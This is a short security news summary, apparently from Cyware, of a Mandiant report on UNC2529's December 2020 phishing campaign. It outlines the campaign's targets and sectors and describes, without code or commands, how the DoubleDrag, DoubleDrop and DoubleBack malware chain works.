A global phishing campaign has been discovered targeting worldwide organizations operating across industries. The phishing campaign used never-before-seen malware strains identified as DoubleDrop, DoubleDrag, and DoubleBack. The campaign used specially-tailored lures.
About the attack
According to a report published by Mandiant, these phishing attacks targeted at least 50 organizations around the world in two waves, during December 2020.
- The prime target of this phishing campaign was the U.S., however, the threat group targeted organizations in Asia, Australia, and EMEA as well.
- Affected sectors were business service, finance, energy, retail, telecom, health, aerospace, manufacturing, national government, transportation, utilities, primary education, and engineering.
- The UNC2529 threat group is behind this global scale phishing campaign, which has deployed the three new malware strains (DoubleDrag, DoubleDrop, and DoubleBack) and used around 50 domains to deliver custom phishing lures.
Additional insights
The malware used during these phishing campaigns was highly obfuscated to prevent researchers from conducting analysis. Moreover, UNC2529 deployed these payloads in memory at several places to evade detection.
- During the two waves of attacks, the threat group sent phishing emails with links to a JavaScript-based downloader (identified as DoubleDrag) or an Excel document with an implanted macro.
- Subsequently, the malicious Excel document with an implanted macro downloaded an in-memory PowerShell-based dropper (identified as DoubleDrop) from attackers' C2 servers.
- Further, the DoubleDrop dropper comes with two 32 and 64-bit instances of a backdoor (identified as DoubleBack) implemented as a PE dynamic library and injected into the PowerShell process.
Conclusion
Although there is no evidence that points toward the goals of this threat actor, the targeting of multiple industries and geographies is mostly observed in the case of financially motivated groups. Moreover, DoubleBack appears to be an ongoing attack campaign, indicating that this threat actor is not done yet and maybe preparing for more severe or targeted attacks.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/dd02_shutterstock_1465728548.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/4e1f_shutterstock_530331409.jpg)
